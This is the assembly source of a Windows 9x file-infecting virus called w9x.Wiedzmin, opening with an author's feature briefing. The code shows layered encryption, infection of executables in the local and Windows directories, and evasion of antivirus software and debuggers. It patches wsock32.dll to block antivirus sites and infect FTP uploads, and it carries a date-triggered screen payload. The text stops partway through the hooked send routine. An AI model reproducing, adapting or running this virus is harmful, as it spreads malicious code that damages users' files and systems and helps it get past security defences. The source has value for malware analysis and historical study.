; W D nnn
; WW Ww o D M O Nn nn
; Ww wW i eEeE dddDD ZzzZzZ Mm m m nN nn
; wW Ww ii e E d dD Zz m M M mm ii N n n
; Ww w wW ii Eeee d dD z mm m m i n N n
; W W W W ii e d dD z m mm ii n n n
; wWw wWwW iii eEee d dD zZzZzZ mm mm ii n nn
; ddddDd mm iii n n
; <20>Ä Briefing Ä<>
; Virus name : w9x.Wiedzmin
; Virus version : 1.0
; Virus author : Lord YuP - Deithwen Addan
; Release date : 6.02.02+8.02.02 i forgot to install SEH, he he
; Virus type : PE infector and WSOCK32.DLL hooker
; Target Systems : win95<nt>, win98<nt>, winME<t>
; †[nt] - not tested (should work, if not fuck it!)
; †[t] - tested
; † 1 - cryptz main virus body †
; † 2 - cryptz host body †
; † 3 - cryptz virus data †
; Every layer is crypted by another key.
; Virus helper : Virus when found section called different
; then ".text" or "CODE" (EIP must point to
; it) it is gonna to crypt all file body
; and put only decryptor into last section.
; The main body (with other virus probably)
; is crypted by random key. EIP points to
; decryptor.
; Polymorphic : Yep random key crypting, adding
; 90h<NOP> garbage in the range
; of 0-255.
; AntiAV : Virus wouldn't infect filez
; with 'a','A','E','e','v','V'
; at start.
; AntiDEBUG : Yep, using win9x Softice detection,
; and IsDebuggerPresent API. When
; sice is found it shows message in
; debbuger and exec int 19h !
; Other debbugers like td32, SoftSnoop
; end so on = int 19h!
; WSOCK32 hooker : Virus infect wsock32.dll replacing the
; send, connect function addressez.
; After reboot (wininit.ini ;P) functionz
; will be hooked. User will never connect
; to AV sitez (error: host not found),
; and when user will try to put a file in
; the FTP account, virus will infect it on
; fly.
; Infection procez : Virus infect 7 filez in the local
; directory and 7 filez in the windowz
; directory. Virus is going to apend
; itself to the last section. The section
; is increased. EIP points to it.
; Payload : On 22.06 or 22.12 every run it gonna
; print color string in the infinite
; loop. The string will be VISIBLE
; everywhere - virus grabz active
; window HDC!
.model flat
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
dwLowDateTime dd ?
dwHighDateTime dd ?
dwFileAttributes dd 0
dwLowDateTime0 dd ?
dwHigDateTime0 dd ?
dwLowDateTime1 dd ?
dwHigDateTime1 dd ?
dwLowDateTime2 dd ?
dwHigDateTime2 dd ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved dd 0,0
cFileName db 260 dup(0)
cAlternateFilename db 14 dup(0)
db 2 dup(0)
hooksize equ hook_end-start_h
sendh equ (offset hooked_send-offset start_h)
connecth equ (offset hooked_connect-offset start_h)
vvsize equ HeapEnd-HeapStart
virussize equ VirusEnd-v_start
allsize equ virussize
TO_DE equ @loop_decryptt-@to_this
helper equ @helper_end-@uncrypt
virussizee macro
db virussize/10000 mod 10 + "0"
db virussize/01000 mod 10 + "0"
db virussize/00100 mod 10 + "0"
db virussize/00010 mod 10 + "0"
db virussize/00001 mod 10 + "0"
db ?
call @delta
pop ebp ;ebp contains address of @delta right now in
sub ebp,offset @delta ;memory -> we must sub the linking @delta val
cmp ebp,0
lea edx,[ebp+offset @to_this]
mov eax,[ebp+key_main]
mov ecx,TO_DE
xor byte ptr [edx],al
inc edx
loop @loop_decrypt
cmp edi,'!PUY'
jne @to_this
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
lea eax, [ebp+fault] ; Setup a SEH frame
push eax
push dword ptr fs:[0]
mov fs:[0], esp
mov eax,0BFF70000h ;kerneloz w95
cmp word ptr [eax],'ZM'
;NT moze pozniej :p
mov eax,0BFF60000h ;ladujemy kernela ;) winME ;)
cmp word ptr [eax],'ZM' ;check is it a exe file
jmp @EXIT
mov dword ptr [ebp+capis],5h
mov dword ptr [ebp+Kernel],eax
mov dword ptr [ebp+NON],000000h
mov dword ptr [ebp + AOF],000000h
mov dword ptr [ebp + AON],000000h
mov dword ptr [ebp + AOO],000000h
mov edx,eax
mov ebx,edx
mov edi, [eax + 03ch] ;a valid PE ?
add edx, edi
cmp dword ptr [edx],'EP'
jne @EXIT
mov edx,[edx + 078h] ;export table
add edx,eax ;mamy w edx -> export table
mov esi,[edx + 018h]
mov dword ptr [ebp + NON],esi
mov esi,[edx+1Ch]
mov dword ptr [ebp + AOF],esi
add dword ptr [ebp + AOF],eax
mov esi,[edx+20h]
mov dword ptr [ebp + AON],esi
add dword ptr [ebp + AON],eax
mov esi,[edx+24h]
mov dword ptr [ebp + AOO],esi
add dword ptr [ebp + AOO],eax
mov esi,dword ptr [ebp + AON]
mov [ebp+offset IndexA],esi ;save into naming index
mov esi,dword ptr [esi]
add esi,eax
xor ebx,ebx
cmp dword ptr [ebp+capis],5h
je @zwykle
lea edi,[ebp+offset A1]
mov ecx,A1s
cmp dword ptr [ebp+capis],1
jne @porownaj
lea edi,[ebp+offset A2]
mov ecx,A2s
jmp @porownaj
lea edi,[ebp + offset APIS] ;mam offset zmiennej
mov ecx,APIS_SIZE ;size api
rep cmpsb ;scan
je found ;if equal calculate function address
add dword ptr [ebp + offset IndexA],4
mov esi,[ebp + offset IndexA]
mov esi,[esi]
add esi,eax
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
inc ebx
cmp dword ptr [ebp+offset NON],ebx
je @EXIT
jmp @__GPA
mov eax,ebx ;mamy GPA !!!
mov ecx,edi
inc ecx
push ecx ;na stos ;P
mov eax,ebx ;EAX=>counter
mov ecx,2
mul ecx ;mnozymy EAX*2
pop ecx ;zdejmujemy ze stosu ECX
mov esi,[ebp + AOO]
add esi,eax
xor eax,eax
mov ax,word ptr [esi]
mov ecx,4
mul ecx
cmp dword ptr [ebp+go_wsock],1
jne @skip_it_urgh
mov esi,[ebp + AOF]
add esi,eax
mov eax,[esi]
cmp dword ptr [ebp+capis],1
je @make_1
;mov ebx,dword ptr [ebp+wsock_hh]
;mov dword ptr [ebp+a_send],eax
;add dword ptr [ebp+a_send],ebx
;mov eax,dword ptr [ebp+a_send]
mov ebx,sendh
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
add edx,ebx
jmp make_real
mov ebx,connecth
mov edx,dword ptr [ebp+moj_address] ;tricky shit ;]
add edx,ebx
mov [esi],edx
inc dword ptr [ebp+capis]
cmp dword ptr [ebp+capis],2
je @go_out_now
mov eax,dword ptr [ebp+wsock_h]
jmp @go_export
@go_out_now: ret
mov esi,[ebp + AOF]
add esi,eax
mov edi,dword ptr [esi]
add edi,[ebp+offset Kernel]
mov eax,edi
mov dword ptr [ebp+_GPA],eax
@GET_APIS: ;API Search
xor esi,esi
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset _FindFirstFileA]
;mamy d wordy czyli skok co 4 bajty
;stosd -> z EAX do EDI
push esi
push dword ptr [ebp+offset Kernel]
call dword ptr [ebp+offset _GPA]
inc esi
cmp byte ptr [esi],00h
jne @next_byte
inc esi
cmp byte ptr [esi],07h
jne @go_table
mov eax,dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+gcd],eax
mov eax,dword ptr [ebp+_WinExec]
mov dword ptr [ebp+wex],eax
lea eax,[ebp+offset wsock]
inc eax
push eax
call dword ptr [ebp+_LoadLibraryA]
mov dword ptr [ebp+wsock_hh],eax
lea ecx,[ebp+offset sle]
push ecx
push eax
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+_WSASetLastError],eax
lea ecx,[ebp+offset A1]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_send],eax
lea ecx,[ebp+offset A2]
push ecx
push dword ptr [ebp+wsock_hh]
call dword ptr [ebp+offset _GPA]
mov dword ptr [ebp+a_connect],eax
push 1000h ; MEM_COMMIT
push 1000 ; size of buffer
push 0 ; lpAddress
call dword ptr [ebp+_VirtualAlloc] ; Alloc IT!
mov dword ptr [ebp+vbuf],eax
;********************************DEBUG TRAP******************************************************
;call @debug_trap
call @wsockz
mov dword ptr [ebp+go_wsock],0
lea eax,[ebp+SYSTEM_TIME]
push eax
call dword ptr [ebp+_GetSystemTime]
cmp word ptr [ebp+wMonth],6 ;22.06 Midaëte
jne try_
cmp word ptr [ebp+wDay],22
jne try_
call make_it_real
cmp word ptr [ebp+wMonth],12 ;22.12 Midinvaerne
jne cya_folx
cmp word ptr [ebp+wDay],22
jne cya_folx
call make_it_real
call @GGEN_KEY
lea edi,[ebp+offset APIList]
lea esi,[ebp+offset APIList]
lea edi,[ebp+offset TO_CRYPT_DATA]
lea esi,[ebp+offset TO_CRYPT_DATA]
lea edi,[ebp+finddata.cFileName]
call dword ptr [ebp+_GetCommandLineA]
mov esi,eax
xor ebx,ebx
cmp al,0
je @GetWDir
cmp al,' '
je _ave_it
jmp _skip_space
inc ebx
cmp al,0
je @infect_shit
jmp _ave_it
cmp ebx,4
jl @GetWDir
lea esi,[ebp+offset finddata.cFileName]
add esi,ebx
sub esi,5
cmp al,'.'
je yep_it
jmp @GetWDir
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
push 0h
call dword ptr [ebp+_ExitProcess]
lea eax,[ebp+offset winDIR]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
;now local dir
lea eax,[ebp+offset oldDIR]
push eax
push 560
call dword ptr [ebp+_GetCurrentDirectoryA]
mov dword ptr [ebp+was_win],0000000h
mov dword ptr [ebp+ic],0000000h
lea eax,[ebp+offset finddata]
push eax
lea eax,[ebp+offset marker]
push eax
call dword ptr [ebp+_FindFirstFileA]
mov dword ptr [ebp+sHnd],eax
inc eax
jz @d_dalej
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
lea eax,[ebp+offset finddata]
push eax
push dword ptr [ebp+offset sHnd]
call dword ptr [ebp+_FindNextFileA]
cmp eax,0
je @d_dalej
push dword ptr [ebp+key_main]
push dword ptr [ebp+key_next]
push dword ptr [ebp+e_bytes]
push dword ptr [ebp+e_where]
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
pop dword ptr [ebp+e_where]
pop dword ptr [ebp+e_bytes]
pop dword ptr [ebp+key_next]
pop dword ptr [ebp+key_main]
cmp dword ptr [ebp+ic],7
jne @@Fnext
cmp dword ptr [ebp+was_win],0
jne @dalej
cmp dword ptr [ebp+was_win],0
jne _stepnext
lea eax,[ebp+offset winDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
mov dword ptr [ebp+ic],0000000h
mov dword ptr [ebp+was_win],1
push dword ptr [ebp+sHnd]
call dword ptr [ebp+_FindClose]
cmp dword ptr [ebp+ic],7
jne @Find1st
lea eax,[ebp+offset oldDIR]
push eax
call dword ptr [ebp+_SetCurrentDirectoryA]
jmp @EXIT
mov esp, [esp+8]
push 4000h
push 1000
push dword ptr [ebp+vbuf]
call dword ptr [ebp+_VirtualFree]
pop dword ptr fs:[0]
add esp, 4
cmp ebp,0 ;first GeneratioN?
jne _ETH ;tak to wyjc ;]
call fakehost
call @uncrypt
call @gd
@gd: pop ebp
sub ebp,offset @gd
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
Kernel dd 0
call @bad_name
cmp edi,1
jne _continue
lea esi,[ebp+offset finddata.cFileName]
push esi
call dword ptr [ebp+_GetFileAttributesA]
mov dword ptr [ebp+fileAtrib],eax
inc eax
jz _Out
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_GetFileTime]
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp] ; clean file
cmp eax,0
je _Out
;mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
;mov [ebp+offset memory],ecx
;Ble otfieramy zeby miec handle
xor eax,eax
lea esi,[ebp+offset finddata.cFileName]
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [ebp+_CreateFileA]
mov edi,eax ;w edi handle
inc eax
jz _Out
dec eax
mov dword ptr [ebp+offset fileHandle],eax
push 0
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_GetFileSize]
mov dword ptr [ebp+fSize],eax
inc eax
jz _Out2
dec eax
mov dword ptr [ebp+finddata.nFileSizeLow],eax
mov ecx,dword ptr [ebp+fSize]
call MapF
mov ecx,dword ptr [ebp+fSize]
call VMapF
;w esi mamy maping tak jak z kernelem
cmp word ptr [esi],'ZM'
jne _Out3
mov ecx,[esi+3ch]
cmp dword ptr [esi+ecx],'EP'
jne _Out3
add esi,ecx ;ESI => PE HEADER
mov edi,esi
mov dword ptr [ebp+header],esi
mov ecx,[esi+28h]
mov dword ptr [ebp+hosteip],ecx
mov ecx,[esi+3ch]
mov dword ptr [ebp+align],ecx
mov ecx,[esi+34h]
mov dword ptr [ebp+imagebase],ecx
mov ecx,[esi+38h] ;get section align value
mov [ebp + _secAlign],ecx ;and save it
cmp dword ptr [esi+4ch],"deiW"
jz _No_infect
push dword ptr [esi+3Ch]
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
;mov eax,dword ptr [ebp+go_wsock]
mov eax,dword ptr [ebp+fSize] ; And Map all again.
cmp dword ptr [ebp+go_wsock],1
je @dodaj
add eax,virussize+vvsize
;add eax,vvsize
jmp @nextt
@dodaj:add eax,hooksize
pop ecx
call Align_
mov dword ptr [ebp+memory],eax
mov ecx,eax
call MapF
mov ecx,dword ptr [ebp+memory]
call VMapF
cmp dword ptr [ebp+go_wsock],1
je @0dal
call @crypt_host
cmp dword ptr [ebp+help_virus],1
je _God
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
inc dword ptr [ebp+ic]
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = n§ of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
;mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
cmp dword ptr [ebp+go_wsock],1
je @infect_then
mov eax,dword ptr [ebp+NewEIP]
mov [edi+28h],eax
mov eax,[esi+10h] ; EAX = new SizeOfRawData
cmp dword ptr [ebp+go_wsock],1
je @dallejj
add eax,vvsize+virussize ; EAX = EAX+VirusSize
jmp @nexttt
@dallejj: add eax,hooksize
mov ecx,[edi+3Ch] ; ECX = FileAlignment
call Align_ ; Align!
mov [esi+10h],eax ; New SizeOfRawData
mov [esi+08h],eax ; New VirtualSize
pop edx ; EDX = Raw pointer to the
; end of section
cmp dword ptr [ebp+go_wsock],1
je @skip_thiss
mov eax,[esi+10h] ; EAX = New SizeOfRawData
add eax,[esi+0Ch] ; EAX = EAX+VirtualAddress
mov [edi+50h],eax ; EAX = New SizeOfImage
or dword ptr [esi+24h],0A0000020h
mov dword ptr [edi+4ch],"deiW" ;Wiedzmin here ;)
lea esi,[ebp+v_start] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
mov dword ptr [ebp+moj_address],edi
; section
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,virussize ;ECX = Size to copy
cmp dword ptr [ebp+go_wsock],1
jne @write_it
mov ecx,hooksize
lea esi,[ebp+start_h]
cmp dword ptr [ebp+go_wsock],1
je step_0
call @crypt_my_body
jmp step_1
step_0: rep movsb ;Do it!
cmp dword ptr [ebp+go_wsock],1
jne _Git
jmp _God
cmp dword ptr [ebp+go_wsock],1
jne @zw
mov edx,-1
jmp _God
mov ecx,dword ptr [ebp+finddata.nFileSizeLow]
call @zostaf
dec dword ptr [ebp+ic]
mov eax,[ebp+offset fMapReal]
push eax
mov eax, [ebp+_UnmapViewOfFile]
call eax
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
lea eax,[ebp+F1]
push eax
lea eax,[ebp+F2]
push eax
lea eax,[ebp+F3]
push eax
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_SetFileTime]
push dword ptr [ebp+offset fileHandle]
call dword ptr [ebp+_CloseHandle]
cmp dword ptr [ebp+go_wsock],1
je @@@z
push 1
lea eax,[ebp+santa]
push eax
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_CopyFileA]
;&resetore the attributez
push dword ptr [ebp+fileAtrib]
lea eax,[ebp+finddata.cFileName]
push eax
call dword ptr [ebp+_SetFileAttributesA]
mov edx,-1
push edx
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
xor eax,eax
push eax
push eax
push ecx
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetFilePointer]
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+offset _SetEndOfFile]
;ECX - size to map
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [ebp+fileHandle]
call dword ptr [ebp+_CreateFileMappingA]
cmp eax,0
je _Out2
mov dword ptr [ebp+fHndMap],eax
xor eax,eax
push ecx
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_MapViewOfFile]
cmp eax,0
je _Out3
mov dword ptr [ebp+fMapReal],eax
mov esi,eax
@debug_trap: ;ret
call dword ptr [ebp+_IsDebuggerPresent]
or eax,eax
jz _leave_me
ble: mov eax, 909119cdh ;int 19h!
jmp $ - 4
lea eax,[ebp+sice9x]
push 00000000h
push 00000080h
push 00000003h
push 00000000h
push 00000001h
push 0C0000000h
push eax
call dword ptr [ebp+_CreateFileA]
inc eax
jz leave_it
dec eax
push eax
call dword ptr [ebp+_CloseHandle]
lea eax,[ebp+to_ja]
push eax
call dword ptr [ebp+_OutputDebugStringA]
mov eax, 909119cdh ;int 19h!
jmp $ - 4
jmp @EXIT
leave_it: ret
;PayL0ad ;]
;this is very simple coz i don't have any time to make it perfect
p_x dd 0
p_y dd 0
hdc dd 0
wh dd 0
screen_x dd 0
screen_y dd 0
font dd 0
color: dd 15466513
dd 15474944
dd 15484928
dd 15496448
lea esi,[ebp+@GDI_APIZ]
lea edi,[ebp+@GDI_APIZA]
lea ebx,[ebp+gdi32]
push ebx
call dword ptr [ebp+_LoadLibraryA]
mov ebx,eax
push esi
push ebx
call dword ptr [ebp+_GPA]
inc esi
cmp byte ptr [esi],0
jne check_a
inc esi
cmp byte ptr [esi],77h
je change_ll
cmp byte ptr [esi],69h
je @go_pay
jmp @find_a
change_ll: inc esi
lea ebx,[ebp+user32]
jmp change_l
push 1
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_y],eax
push 0
call dword ptr [ebp+_GetSystemMetrics] ;user
mov dword ptr [ebp+screen_x],eax
call c_font
lea esi,logo
xor ebx,ebx
call dword ptr [ebp+_GetDesktopWindow] ;user
mov dword ptr [ebp+wh],eax
push dword ptr [ebp+wh]
call dword ptr [ebp+_GetWindowDC] ;user
mov dword ptr [ebp+hdc],eax
call draww
push dword ptr [ebp+hdc]
push dword ptr [ebp+wh]
call dword ptr [ebp+_ReleaseDC] ;user
jmp l
xor eax,eax
lea edi,[ebp+jed]
cmp al,0
jne @wypisz
lea esi,[ebp+logo]
lea edi,[ebp+jed]
cmp al,'i'
jne @dik
add dword ptr [ebp+p_x],6
push dword ptr [ebp+font]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SelectObject] ;gdi
push 0
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetBkMode] ;gdi
mov eax,dword ptr [ebp+color+ebx]
add ebx,4
cmp ebx,4*4
jl @n1
xor ebx,ebx
push eax
push dword ptr [ebp+hdc]
call dword ptr [ebp+_SetTextColor] ;gdi
push 1
lea eax,[ebp+jed]
push eax
push dword ptr [ebp+p_y]
push dword ptr [ebp+p_x]
push dword ptr [ebp+hdc]
call dword ptr [ebp+_TextOutA] ;gdi
mov eax,dword ptr [ebp+screen_y]
cmp dword ptr [ebp+p_y],eax
jae chang_g
mov eax,dword ptr [ebp+screen_x]
add dword ptr [ebp+p_x],13
cmp dword ptr [ebp+p_x],eax
jle spp
mov dword ptr [ebp+p_x],0
add dword ptr [ebp+p_y],15
jmp spp
chang_g: mov dword ptr [ebp+p_y],0
push 50
call dword ptr [ebp+_Sleep]
push offset famil
xor eax,eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push 9
push 9
call dword ptr [ebp+_CreateFontA] ;gdi
mov [font],eax
@GDI_APIZ: db "CreateFontA",0
db "TextOutA",0
db "SetBkMode",0
db "SetTextColor",0
db "SelectObject",0
db 77h
db "GetSystemMetrics",0 ;user32 part X-D
db "GetDesktopWindow",0
db "GetWindowDC",0
db "ReleaseDC",0
db 69h
;Handle this sucker ;]
;push dword ptr [ebp+key_next]
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,0h ;28 bytes for each section header
add esi,ecx ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = n§ of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov ecx,[edi+28h]
mov ebx,dword ptr [esi+0ch]
add ebx,dword ptr [esi+08h]
inc eax
cmp ecx,ebx
jb sfound
dec eax
jz @e_error
add esi,28h
jmp search_it
test dword ptr [esi+24h],10000000h ;check section atributes
jnz @e_error
or dword ptr [esi+24h],0A0000020h
cmp dword ptr [esi],'xet.'
je _01
cmp dword ptr [esi],'EDOC'
je _01
mov dword ptr [ebp+help_virus],1
push eax
mov edx,ecx
sub edx,dword ptr [esi+0ch] ;IMAGEBASE - VIRTUAL RVA=0
add edx,[esi+014h] ;ADD RAW OFFSET
mov dword ptr [ebp+e_where],edx
push edx
mov edx,[esi+010h]
mov dword ptr [ebp+e_bytes],edx
pop edx
add edx,dword ptr [ebp+fMapReal] ;WHERE TO CRYPT!
mov ecx,[esi+10h]
mov dword ptr [ebp+e_god],0
mov dword ptr [ebp+firstk],1h
lea edi,[ebp+key_next]
call @GGEN_KEY
call @combine_key
mov eax,dword ptr [ebp+key_next]
mov dword ptr [ebp+firstk],0
push esi
mov eax,dword ptr [ebp+key_next]
xor ebx,ebx
cmp byte ptr [edx],00h
jne @go_
cmp byte ptr [edx+1],00h
jne @go_
cmp byte ptr [edx+2],00h
jne @go_
cmp byte ptr [edx+3],00h
jne @go_
cmp byte ptr [edx+4],00h
je @crypted
xor byte ptr [edx],al
inc edx
loop @loop_it
jmp @e_out
pop esi
mov eax,dword ptr [ebp+e_bytes]
sub eax,ecx
mov dword ptr [ebp+e_bytes],eax
jmp @e_out
pop eax
cmp dword ptr [ebp+help_virus],1
je @mute_other_virus
mov eax,dword ptr [ebp+key2]
add eax,dword ptr [ebp+key]
lea edi,[ebp+key_main]
call delta_e
delta_e: pop ebp
sub ebp,offset delta_e
mov edx,dword ptr [ebp+imagebase]
add edx,dword ptr [ebp+hosteip]
mov ecx,dword ptr [ebp+e_bytes]
xor ebx,ebx
mov eax,[ebp+key_next]
xor byte ptr [edx],al
inc edx
loop @lloop_it
cmp dword ptr [ebp+czy_je],0
jne @helper_endd
mov eax,dword ptr [ebp+hosteip]
add eax,dword ptr [ebp+imagebase]
jmp eax
czy_je dd 0
e_bytes dd 0
e_where dd 0
e_god dd 0
hosteip dd 0
imagebase dd 0
key_next dd 0
@helper_end: nop
mov eax,dword ptr [ebp+fMapReal]
mov esi,[eax+3ch]
add esi,eax ;ESI => PE HEADER
mov edi,esi
xor eax,eax
mov ax,[esi + 06h] ;load number of sections
mov ecx,28h ;28 bytes for each section header
dec eax ;seeking for last,...
mul ecx ;and mul it
add esi,eax ; Normalize
add esi,78h ; Ptr to dir table
mov edx,[edi+74h] ; EDX = n§ of dir entries
shl edx,3 ; EDX = EDX*8
add esi,edx ; ESI = Ptr to last section
mov edx,[esi+10h] ; EDX = SizeOfRawData
mov ebx,edx ; EBX = EDX
add edx,[esi+14h] ; EDX = EDX+PointerToRawData
push edx ; Preserve EDX
mov eax,ebx ; EAX = EBX
add eax,[esi+0Ch] ; EAX = EAX+VA Address
; EAX = New EIP
mov [edi+28h],eax ; Change the new EIP
mov dword ptr [ebp+NewEIP],eax ; Also store it
mov eax,dword ptr [ebp+fSize]
add eax,helper
mov ecx,[edi+3Ch]
call Align_
mov [esi+10h],eax
mov [esi+08h],eax
pop edx
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edi+50h],eax
lea esi,[ebp+@uncrypt] ; ESI = Ptr to virus_start
xchg edi,edx ; EDI = Raw ptr after last
add edi,dword ptr [ebp+fMapReal] ;EDI = Normalized ptr
mov ecx,helper
mov dword ptr [ebp+czy_je],1
rep movsb
push dword ptr [ebp+offset fMapReal]
call dword ptr [ebp+_UnmapViewOfFile]
push dword ptr [ebp+fHndMap]
call dword ptr [ebp+_CloseHandle]
mov ecx,dword ptr [ebp+fSize]
add ecx,helper
call @zostaf
push dword ptr [ebp+fHnd]
call dword ptr [ebp+_CloseHandle]
;Wsock32 hooker!!!
mov eax,dword ptr [ebp+_GetSystemDirectoryA]
mov ebx,dword ptr [ebp+_GPA]
push 260
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_GetSystemDirectoryA]
lea eax,[ebp+offset winDIRr]
push 260
push eax
call dword ptr [ebp+_GetWindowsDirectoryA]
lea edi,[ebp+sysDIR]
lea esi,[ebp+wsock]
call strcat
lea edi,[ebp+winDIRr]
lea esi,[ebp+nowe]
call strcat
push 1
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
call dword ptr [ebp+_CopyFileA]
cmp eax,0
je bye
lea edi,[ebp+finddata.cFileName]
lea esi,[ebp+winDIRr]
call strcat
mov dword ptr [ebp+go_wsock],1
push dword ptr [ebp+hosteip]
push dword ptr [ebp+imagebase]
call @infect
pop dword ptr [ebp+imagebase]
pop dword ptr [ebp+hosteip]
cmp edx,-1
je bye
mov dword ptr [ebp+capis],0
mov eax,dword ptr [ebp+fMapReal]
mov dword ptr [ebp+wsock_h],eax
call @go_export
call _God
mov dword ptr [ebp+go_wsock],0
lea eax,[ebp+WININIT]
push eax
lea eax,[ebp+winDIRr]
push eax
lea eax,[ebp+sysDIR]
push eax
lea eax,[ebp+rename]
push eax
call dword ptr [ebp+_WritePrivateProfileStringA]
bye: ret
;STRCAT !!! Its smaller and faster (i think - but non optimized with repz)
;edi - base buffer
;esi - string to cut
push esi
mov esi,edi
sstrcat: lodsb
cmp al,0
jne sstrcat
dec esi
mov edi,esi
pop esi
cmp al,0
je le
jmp cat_it
;Filez with 'a','A','E','e','v','V' at start - wouldn't be infected ;]
xor edi,edi
lea esi,[ebp+finddata.cFileName]
cmp al,'a'
je error_a
cmp al,'A'
je error_a
cmp al,'E'
je error_a
cmp al,'e'
je error_a
cmp al,'v'
je error_a
cmp al,'V'
je error_a
error_a: inc edi
cmp dword ptr [ebp+firstk],1
jne @go__
mov ebx,40h
mov dword ptr [ebp+key2],0h
mov dword ptr [ebp+offset key],0000000h
mov ebx,55h
call dword ptr [ebp+_GetTickCount]
idiv ebx ;w EDX reszta ;) duzo prostszy algorymt zwracania losowych
cmp edx,ebx ;liczb niz ten T2000-Immortal Riota
cmp dword ptr [ebp+firstk],1
je @go___
mov dword ptr [ebp+offset key],edx
@go___: mov dword ptr [ebp+offset key2],edx
mov ecx,edx
lodsb ;czytamy bajta qrwa :P jest w AL
cmp al,0
je _zero
cmp al,07h
je _retprog
_next: add al,cl
jmp Try_crypt
_zero: inc edi
jmp Try_crypt
_retprog: ret
mov ecx,dword ptr [ebp+offset key]
cmp al,0h
je _zero0
cmp al,07h
je ret0
_next0: sub al,cl
jmp Try_uncrypt
_zero0: inc edi
jmp Try_uncrypt
ret0: ret
call get_delta
mov edx,[esp+(10*4)] ; EDX = sockaddr
mov ecx,[edx+(2*2)] ; ip
shl ecx,8 ; last octet
lea esi,[eax+DENIED]
mov edi,eax ;save EAX in EDI
scan_denied: lodsd
dec esi
shl eax,8
jz TOC
cmp ecx,eax
jne scan_denied
call dword ptr [edi+_WSASetLastError]
push -1
pop eax
jmp out_c
TOC: ;tHe oRgInal coNneCt ;]
push [esp+0Ch] ;int namelen
push [esp+4+8] ;const struct sockaddr FAR* name
push [esp+8+4] ;SOCKET s
call dword ptr [eax+a_connect] ;call orginal connect!!!
out_c: retn 0Ch
;//////////////////////////////////////////////hooked send///////////////////////////////////////
call get_delta
mov edi,eax
